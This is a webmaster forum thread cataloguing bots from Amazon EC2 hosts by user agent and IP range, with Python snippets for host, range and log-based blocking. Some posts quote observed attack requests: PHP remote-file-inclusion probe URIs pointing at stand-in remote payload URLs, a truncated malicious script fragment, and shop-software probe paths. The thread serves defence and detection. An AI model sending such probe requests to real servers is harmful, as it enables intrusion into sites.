amazonaws.com plays host to wide variety of bad bots

Most recently seen: Gnomit

     
3:04 am on Jan 18, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts:2038
votes: 1


ec2-67-202-57-30.compute-1.amazonaws.com
Mozilla/5.0 (compatible; X11; U; Linux i686 (x86_64); en-US; +http://gnomit.com/) Gecko/2008092416 Gnomit/1.0"

- robots.txt? NO
- Unbalanced quotation marks in UA (closing only)
- site in UA yields this oh-so-descriptive info:

<html>
<head>
</head>
<body>
</body>
</html>

----- ----- ----- ----- -----
FWIW, bona fide amazonaws.com hosts spewed at least 33 bots on two of my sites in recent months. (Does someone get paid per bot or something?) Some bots may be new to some of you; or newly renamed. Here are the actual UA strings; in no particular order:

NetSeer/Nutch-0.9 (NetSeer Crawler; [netseer.com;...] crawler@netseer.com)
robots.txt? YES

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
[Note ru.]
robots.txt? NO

feedfinder/1.371 Python-urllib/1.16 +http://www.aaronsw.com/2002/feedfinder/
robots.txt? NO

Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008022910 Viewzi/0.1
robots.txt? NO

Twitturly / v0.5
robots.txt? NO

YebolBot (compatible; Mozilla/5.0; MSIE 7.0; Windows NT 6.0; rv:1.8.1.11; mailTo:thunder.chang@gmail.com)
robots.txt? NO

YebolBot (Email: yebolbot@gmail.com; If the web crawling affects your web service, or you don't like to be crawled by us, please email us. We'll stop crawling immediately.)
[Whattaya think robots.txt is for, huh?]
robots.txt? YES ... Four times in 45 minutes

Attributor/Dejan-1.0-dev (Test crawler; [attributor.com;...] info at attributor com)
robots.txt? NO

PRCrawler/Nutch-0.9 (data mining development project)
robots.txt? YES

EnaBot/1.2 (http://www.enaball.com/crawler.html)
robots.txt? YES

Nokia6680/1.0 ((4.04.07) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html) )
[Note spaced-out closing parens]
robots.txt? YES

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461) Java/1.5.0_09
robots.txt? NO

TheRarestParser/0.2a (http://therarestwords.com/)
robots.txt? NO

Mozilla/5.0 (compatible; D1GArabicEngine/1.0; crawlmaster@d1g.com)
robots.txt? NO

Clustera Crawler/Nutch-1.0-dev (Clustera Crawler; [crawler.clustera.com;...] cluster@clustera.com)
robots.txt? YES

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
robots.txt? YES

yacybot (i386 Linux 2.6.16-xenU; java 1.6.0_02; America/en) [yacy.net...]
robots.txt? NO

Mozilla/5.0
robots.txt? NO

Spock Crawler (http://www.spock.com/crawler)
robots.txt? YES

TinEye
robots.txt? NO

Teemer (NetSeer, Inc. is a Los Angeles based Internet startup company.; [netseer.com...] crawler@netseer.com)
robots.txt? YES

nnn/ttt (n)
robots.txt? YES

AideRSS/1.0 (aiderss.com)
robots.txt? NO

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
robots.txt? NO

----- ----- ----- ----- -----
These two UAs alternated multiple times one afternoon:

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
robots.txt? NO

WebClient
robots.txt? YES

----- ----- ----- ----- -----
And finally, way too many offerings from "Paul," who's apparently unable to make up his mind, UA name-wise:

Mozilla/5.0 (compatible; page-store) [email:paul at page-store.com
robots.txt? NO

Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com)
robots.txt? YES

Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]
robots.txt? YES

Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO

zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES

zermelo Mozilla/5.0 compatible; heritrix/1.12.1 (+http://www.powerset.com) [email:crawl@powerset.com,email:paul@page-store.com]
robots.txt? YES

Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
robots.txt? NO

-----
Slippery little suckers indeed. Thank goodness I block amazonaws.com no matter what.
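
For readers who want to script a host-based block like the one described above, here is a minimal Python sketch. It assumes you already have the client IP from your logs; the function names (is_aws_host, reverse_lookup, should_block) are made up for illustration and are not part of any server's API. The suffix test is anchored on a dot so that look-alikes such as "amazonaws.com.example.net" do not match. An IP with no PTR record, or one whose PTR does not mention amazonaws.com, will slip past this check.

```python
import socket

AWS_SUFFIX = "amazonaws.com"

def is_aws_host(hostname):
    """True if hostname is amazonaws.com or any subdomain of it."""
    host = hostname.strip().rstrip(".").lower()
    return host == AWS_SUFFIX or host.endswith("." + AWS_SUFFIX)

def reverse_lookup(ip):
    """Return the PTR hostname for ip, or None if the lookup fails."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        # Covers socket.herror / socket.gaierror (no PTR, DNS failure, ...)
        return None

def should_block(ip):
    """Hypothetical policy: block when reverse DNS resolves under amazonaws.com."""
    host = reverse_lookup(ip)
    return host is not None and is_aws_host(host)

if __name__ == "__main__":
    # Pure string check, no network needed:
    print(is_aws_host("ec2-67-202-57-30.compute-1.amazonaws.com"))
```

Only should_block touches the network; is_aws_host can be run against hostnames already resolved in a log file.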

7:31 pm on Nov 17, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Many, many AWS-based UAs still hitting home and specific pages. robots.txt? NEVER.

DAILY (multiple times; always HEAD requests):

ec2-75-101-197-164.compute-1.amazonaws.com
PycURL/7.18.2

ec2-174-129-141-109.compute-1.amazonaws.com
PostRank/2.0 (postrank.com)

WEEKLY (approx.; always HEAD requests):

ec2-174-129-91-231.compute-1.amazonaws.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)

(Two days earlier, Netcraft sent its minion...)

lager.netcraft.com
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)

10:20 pm on Nov 17, 2009 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts: 3135
votes: 4


I just dumped the whole 174.129.nnn.nnn block into IIS's Security Deny list - won't ever see it again even in the logs. A /24 of a persistent 75.101 block followed it in and is likely to be extended any day now...
11:38 pm on Nov 17, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


One more for your files, dstiles:)

I forgot to mention this many, many, many times a day pest. No robots.txt, 'natch. GETs, not HEADs:

ec2-67-202-15-174.compute-1.amazonaws.com
Python-urllib/2.6

12:06 am on Nov 18, 2009 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts: 3135
votes: 4


Only got one hit near that this month (176, not 174) but lots more in the 67.202.nnn.nnn range. Their days may be numbered but I'm interested in seeing what else comes along. :)

I already have all known (to me) AWS blocks blocked with hits logged, including 67.202.0.0 - 67.202.127.255. It's when the hits cloud other logged issues that I react violently. :)
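
A rough Python sketch of the same idea, for anyone testing logged IPs against a range list outside the web server. It only covers the two ranges named in this thread so far, written in CIDR form; it is not a complete list of AWS address space, and the name is_blocked is just an illustration.

```python
import ipaddress

# CIDR forms of the two ranges named so far in this thread (not a full AWS list):
#   67.202.0.0/17  covers 67.202.0.0  - 67.202.127.255
#   174.129.0.0/16 covers 174.129.0.0 - 174.129.255.255
BLOCKED_NETWORKS = [
    ipaddress.ip_network("67.202.0.0/17"),
    ipaddress.ip_network("174.129.0.0/16"),
]

def is_blocked(ip):
    """True if ip falls inside any network in BLOCKED_NETWORKS."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKED_NETWORKS)

if __name__ == "__main__":
    for ip in ("67.202.15.174", "67.202.200.1", "174.129.141.109"):
        print(ip, "blocked" if is_blocked(ip) else "allowed")
```

Note that 67.202.200.1 falls outside the /17, so a hit from the upper half of 67.202 would need its own entry.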

6:40 pm on Nov 19, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:July 26, 2006
posts:1619
votes: 0


Yup .. had to just block ALL
174.129.x.x

MASSIVE numbers of form submits, like 600 in less than one minute.

8:01 pm on Nov 19, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Amazon's Elastic Compute Cloud (EC2)/AWS hosting gets bigger and biggger and bigggger:

174.129.0.0 - 174.129.255.255
174.129.0.0/16
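
The two lines above are the same block written two ways. A small Python sketch, using only the standard ipaddress module, shows how to convert a first/last range into CIDR notation; the helper name range_to_cidrs is an assumption for illustration.

```python
import ipaddress

def range_to_cidrs(first, last):
    """Convert an inclusive first-last IPv4 range to a list of CIDR strings."""
    nets = ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last)
    )
    return [str(net) for net in nets]

if __name__ == "__main__":
    print(range_to_cidrs("174.129.0.0", "174.129.255.255"))
    print(range_to_cidrs("67.202.0.0", "67.202.127.255"))
    # Size of the /16, for a sense of scale:
    print(ipaddress.ip_network("174.129.0.0/16").num_addresses)
```

A range that does not sit on a power-of-two boundary comes back as several CIDR entries, which is why the function returns a list.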

@Bewenched: Yikes. Were you attacked by a single IP/amazonaws.com Host? If yes, which one, please? Also, was there one particular UA? TIA

10:51 pm on Nov 19, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


ec2-174-129-75-209.compute-1.amazonaws.com
SheenBot/SheenBot-1.0.0 (Sheen web crawler)

robots.txt? Yes

11:00 pm on Nov 19, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Two UAs crawling Tweeted URLs:

ec2-174-129-62-166.compute-1.amazonaws.com
Typhoeus - http://github.com/pauldix/typhoeus/tree/master

robots.txt? NO

ec2-75-101-227-191.compute-1.amazonaws.com
Jakarta Commons-HttpClient/3.1

robots.txt? NO

9:11 am on Nov 21, 2009 (gmt 0)

Moderator This Forum from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7009
votes: 175


ec2-174-129-225-12.compute-1.amazonaws.com
UA: Who.is Bot
robots.txt: no

hit / and ran

9:46 am on Nov 21, 2009 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 29, 2005
posts:7055
votes: 424


I'm so close to adding Deny 174.129* that I have to ask (and I ask because this topic thrills me, but I have little to zero ambition to learn it fully): are there ANY legit visitors from this domain? So far I've seen none. I lean toward whitelisting (less work) rather than spending oodles of time on pissant denies, because the latter is SO much more work!
10:09 pm on Nov 21, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


I block by Host (amazonaws) and I've yet to see a single real-person-in-real-time hit from AWS since before I began this thread on Jan. 17, 2009. Rapid-fire assaults increase every week, like this 90-second blitz from a few days ago (partial listing):

[18:52:16 2009] [client 174.129.89.199] client denied by server configuration: (file path)
[18:52:24 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:25 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:28 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:38 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:52:41 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:53:17 2009] [client 174.129.175.212] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:54:09 2009] [client 174.129.175.212] client denied by server configuration: (file path)

That range, that place, gives irresponsible bot-runners a place to hide and breed.
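
To tally a blitz like the one listed above, here is a minimal Python sketch. It assumes error-log lines in the abbreviated form shown in this post ("[client IP] client denied by server configuration"); a full Apache error log carries more fields, but the regex only looks for that fragment. The name count_denied is illustrative.

```python
import re
from collections import Counter

# Matches the "[client a.b.c.d] client denied ..." fragment of each line.
DENIED_RE = re.compile(
    r"\[client (\d{1,3}(?:\.\d{1,3}){3})\] client denied by server configuration"
)

def count_denied(lines):
    """Count denied requests per client IP."""
    counts = Counter()
    for line in lines:
        match = DENIED_RE.search(line)
        if match:
            counts[match.group(1)] += 1
    return counts

# The partial listing from the post above.
SAMPLE = """\
[18:52:16 2009] [client 174.129.89.199] client denied by server configuration: (file path)
[18:52:24 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:25 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:28 2009] [client 174.129.193.100] client denied by server configuration: (file path)
[18:52:38 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:52:41 2009] [client 174.129.141.109] client denied by server configuration: (file path)
[18:53:17 2009] [client 174.129.175.212] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:53:40 2009] [client 174.129.62.166] client denied by server configuration: (file path)
[18:54:09 2009] [client 174.129.175.212] client denied by server configuration: (file path)
""".splitlines()

if __name__ == "__main__":
    for ip, hits in count_denied(SAMPLE).most_common():
        print(ip, hits)
```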

11:21 pm on Nov 21, 2009 (gmt 0)

Moderator This Forum from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7009
votes: 175


What range does Amazon's A9 search engine crawl from?
8:39 am on Nov 22, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Good Q. Beats me. Never spotted an A9 hit -- anyone? Then again, it appears A9 is primarily product-oriented now and none of my sites sell stuff. Rather, the majority of my hits from AWS are social network-related.
5:23 pm on Nov 22, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Alas, even Amazon EC2 (Amazon Elastic Compute Cloud) isn't free of exploit-probers:

ec2-67-202-25-2.compute-1.amazonaws.com
Toata dragostea mea pentru diavola

11/22 07:59:29 /1.1
11/22 07:59:29 /install.txt
11/22 07:59:29 /
11/22 07:59:30 /cart/
11/22 07:59:30 /zencart/
11/22 07:59:30 /zen-cart/
11/22 07:59:30 /zen/
11/22 07:59:30 /shop/

Here's info [webmasterworld.com] about the primary 'toata' UA. (There are variations.) As a Romanian-speaking pal of GaryK's translated here [webmasterworld.com], it means: "I love the devil."

4:57 am on Nov 24, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Yikes. Another exploit this evening:

ec2-67-202-60-246.compute-1.amazonaws.com
Jakarta Commons-HttpClient/3.0

//scriptdocument.write(unescape( [remainder of malicious javascript snipped]

At least AWS has recommendations/info [aws.amazon.com] for reporting abuse. Wonder if bad bots qualify as report-worthy, too?;)

---
P.S./FYI

The following hosts/UAs just requested the exact same 'file' -- the URIs match even down to the exact same clientid and site referenced -- within the same 20-minute period. Googlebot, which was the only one to request robots.txt, was also the only one to attempt the hit twice (1 min. apart):

icerocket.com
BlogSearch/1.0 +http://www.icerocket.com/

87.218.210-nn.q9.net
Java/1.6.0_14

crawl-66-249-71-107.googlebot.com
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

64.94.67.nnn
Moreoverbot/5.00 (+http://www.moreover.com; webmaster@moreover.com)

Who's crawling/exploiting whom?

8:59 am on Nov 24, 2009 (gmt 0)

Moderator This Forum from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7009
votes: 175


//scriptdocument.write(unescape( [remainder of malicious javascript snipped]

There's a lot of that coming from various hosts.
10:01 am on Dec 1, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


ec2-67-202-41-144.compute-1.amazonaws.com
cierzo/Nutch-0.9

robots.txt? Yes

10:33 pm on Dec 3, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


ec2-75-101-232-27.compute-1.amazonaws.com
MetaURI API +metauri.com

robots.txt? NO

1:09 am on Dec 4, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


ec2-75-101-158-138.compute-1.amazonaws.com
my6sense/1.0

robots.txt? NO

2:49 am on Dec 7, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Emphasis mine. Running from amazonaws, this is a bot. But it's also a FF add-on, which means, if it alters all FF strings, it'll be iffy distinguishing potential hits from less obvious/notorious server farms.

ec2-75-101-196-241.compute-1.amazonaws.com
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (MrTweet/1.0)

robots.txt? NO

8:10 pm on Dec 9, 2009 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts: 3135
votes: 4


Just to add another reason to block the cloud:

"Zeus crimeware using Amazon's EC2 as command and control server"
(from zdnet security blog)

A few days ago I noted in another thread that I'd seen an AWS IP in the midst of botnet accesses.

2:00 am on Dec 21, 2009 (gmt 0)

Moderator This Forum from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7009
votes: 175


...an AWS IP in the midst of botnet accesses.

In the "midst?" Ha, I looked up "botnet" and expected to see a thumbnail of Amazon EC2:

174.129.117.129 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 940 "-" "-"
75.101.169.108 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 946 "-" "-"
67.202.31.110 - - [19/Dec/2009:08:13:27 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:28 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 945 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:39 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.2.96 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 936 "-" "-"
75.101.213.151 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"
174.129.107.93 - - [19/Dec/2009:08:13:41 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"
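
A quick Python sketch for grouping hits like these by /16, to see how the requests spread across the three blocks discussed in this thread. It assumes access-log lines where the client IP is the first whitespace-separated field, as in the excerpt above; hits_per_slash16 is a made-up helper name.

```python
import ipaddress
from collections import Counter

def hits_per_slash16(log_lines):
    """Count requests per /16 network, keyed by CIDR string."""
    hits = Counter()
    for line in log_lines:
        fields = line.split()
        if not fields:
            continue
        try:
            # strict=False masks the host bits, e.g. 67.202.31.110 -> 67.202.0.0/16
            net = ipaddress.ip_network(fields[0] + "/16", strict=False)
        except ValueError:
            continue  # first field was not an IP address
        hits[str(net)] += 1
    return hits

# The excerpt from the post above.
SAMPLE = """\
174.129.117.129 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 940 "-" "-"
75.101.169.108 - - [19/Dec/2009:08:13:11 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 946 "-" "-"
67.202.31.110 - - [19/Dec/2009:08:13:27 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:28 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 945 "-" "-"
67.202.10.225 - - [19/Dec/2009:08:13:39 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 938 "-" "-"
67.202.2.96 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 936 "-" "-"
75.101.213.151 - - [19/Dec/2009:08:13:40 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"
174.129.107.93 - - [19/Dec/2009:08:13:41 -0700] "GET example.com/favicon.ico HTTP/1.1" 403 939 "-" "-"
""".splitlines()

if __name__ == "__main__":
    for net, count in hits_per_slash16(SAMPLE).most_common():
        print(net, count)
```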

5:36 pm on Dec 22, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts:2038
votes: 1


ec2-174-129-64-134.compute-1.amazonaws.com
Mozilla/5.0 (compatible; XmarksFetch/1.0; +http://www.xmarks.com/about/crawler; info@xmarks.com)

robots.txt? Yes

6:14 pm on Dec 22, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Speaking of AWS/EC2 and botnet-related exploits... Three seconds apart:

.
Mozilla/5.0
22:36:04///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?

ec2-204-236-129-29.us-west-1.compute.amazonaws.com
Mozilla/5.0
22:36:07///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?

Notes:

- The first hit's dot-as-host IP turned out to be 99.198.118.18*, a Chicago-based server farm. Search results show the same IP and exploit hitting elsewhere.

- The intra-URI exploit domain obfuscated in both hits as 'example.com' has approx. 2,150 search results. Its page title? "Verified by Visa" (and content includes "Start by entering your Visa card below...").

- If you're blocking on amazonaws.com subdomain formats, the second hit is slightly different. Typically, they're --

IP.compute-1 (or -2, etc.).amazonaws.com

-- but this is:

IP.us-west-1.compute.amazonaws.com

There are more variations here [robtex.com]. (I block on amazonaws.com)
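
If you do want to pick the hostnames apart rather than block the whole domain, here is a hedged Python sketch that handles only the two formats seen in this thread. Other variations exist, as noted above, and this pattern will return None for them. The name parse_ec2_host and the "zone" label are my own for illustration.

```python
import re

# Two formats seen in this thread:
#   ec2-A-B-C-D.compute-N.amazonaws.com
#   ec2-A-B-C-D.REGION.compute.amazonaws.com
EC2_HOST_RE = re.compile(
    r"^ec2-(\d{1,3})-(\d{1,3})-(\d{1,3})-(\d{1,3})"
    r"\.(?:(?P<legacy>compute-\d+)|(?P<region>[a-z0-9-]+)\.compute)"
    r"\.amazonaws\.com\.?$",
    re.IGNORECASE,
)

def parse_ec2_host(hostname):
    """Return (embedded_ip, zone_label) or None if the format is not recognized."""
    match = EC2_HOST_RE.match(hostname.strip())
    if not match:
        return None
    ip = ".".join(match.group(1, 2, 3, 4))
    zone = match.group("legacy") or match.group("region")
    return ip, zone.lower()

if __name__ == "__main__":
    for host in (
        "ec2-67-202-57-30.compute-1.amazonaws.com",
        "ec2-204-236-129-29.us-west-1.compute.amazonaws.com",
        "lager.netcraft.com",
    ):
        print(host, "->", parse_ec2_host(host))
```

The IP embedded in the hostname is only what the PTR record claims; it is worth comparing against the connecting address before trusting it.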

8:24 pm on Dec 22, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Whoa. Another one. Wonder when AWS/EC2 is going to clean up its act?

ec2-75-101-138-216.compute-1.amazonaws.com
Mozilla/5.0
10:47:33 //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.example.su//assets/images/mawar.txt?

Note: .su is the country-code TLD assigned to the Soviet Union.

(FWIW, I won't keep posting exploit events because this thread's for spider sightings and the fake UA has been reported.)
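
For anyone filtering these out of their own logs: the requests above try to override _SERVER[DOCUMENT_ROOT] with a remote URL, which looks like a remote-file-inclusion probe against PHP scripts. The Python sketch below flags that one pattern, in both its raw and percent-encoded forms. It is a narrow illustration, not a general exploit detector, and looks_like_rfi_probe is a made-up name.

```python
import re
from urllib.parse import unquote

# A _SERVER[...] parameter whose value starts with a remote URL scheme.
RFI_RE = re.compile(r"_SERVER\[[^\]]*\]=(?:https?|ftp)://", re.IGNORECASE)

def looks_like_rfi_probe(request_uri):
    """True if the (possibly percent-encoded) URI sets _SERVER[...] to a URL."""
    return bool(RFI_RE.search(unquote(request_uri)))

if __name__ == "__main__":
    samples = [
        "///?_SERVER[DOCUMENT_ROOT]=http://example.com/unix1.txt?",
        "//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.example.su//assets/images/mawar.txt?",
        "/shop/?page=2",
    ]
    for uri in samples:
        print(looks_like_rfi_probe(uri), uri)
```

Decoding before matching is the point of the sketch: the %5B/%5D variant would otherwise pass a filter written for the bracketed form.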

3:46 pm on Jan 1, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts: 3135
votes: 4


Just found a new (to me) Amazon IP block. Cloud but not labelled AWS.

IP: 204.236.128.0 - 204.236.255.255
UA: Chen Li/Nutch-1.0 (Nutch spiderman; [chenli....] com. cn; chenlibiti @163. com)
Robots: No idea.

Amazon.com, Inc.
OrgID: AMAZO-4
Address: Amazon Web Services, Elastic Compute Cloud, EC2

4:59 pm on Jan 1, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


Good spotting, dstiles! Shoot. Cloaked servers now, too -- and w/ a UA related to China via .cn and 163.com, hosts with long histories of nastiness on my sites. In a word: Ugh.

FWIW, here's yet another UA:

ec2-174-129-141-135.compute-1.amazonaws.com
Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3

robots.txt? NO

11:12 pm on Jan 1, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts:3135
votes: 4


Already got the whole range 174.129.0.0 - 174.129.255.255 blocked! :)
10:05 am on Jan 12, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts: 2038
votes: 1


No UA at all this time, and only went for favicon.ico:

ec2-75-101-169-108.compute-1.amazonaws.com
-

robots.txt? NO

10:50 am on Jan 12, 2010 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 29, 2005
posts:7055
votes: 424


Pfui...

This has been a very interesting thread... what say you parse it to significance and reduce to the fully skinny? For the kiddies out there yet to ask the query?

More fun: provide IP ranges à la amazonaws.com
